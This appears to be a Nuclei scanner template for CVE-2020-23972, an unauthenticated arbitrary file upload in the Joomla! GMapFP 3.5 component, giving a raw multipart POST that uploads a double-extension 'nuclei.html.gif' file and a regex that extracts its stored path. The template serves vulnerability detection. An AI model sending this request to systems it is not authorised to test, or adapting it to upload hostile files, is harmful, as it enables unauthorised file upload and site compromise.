id: CVE-2020-23972 info: name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload author: dwisiswant0 severity: high description: | An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.50 cve-id: CVE-2020-23972 cwe-id: CWE-434 requests: - raw: - | POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} Connection: close ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="option" com_gmapfp ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif" Content-Type: text/html projectdiscovery ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="no_html" no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- payloads: component: - "com_gmapfp" - "comgmapfp" extractors: - type: regex part: body regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"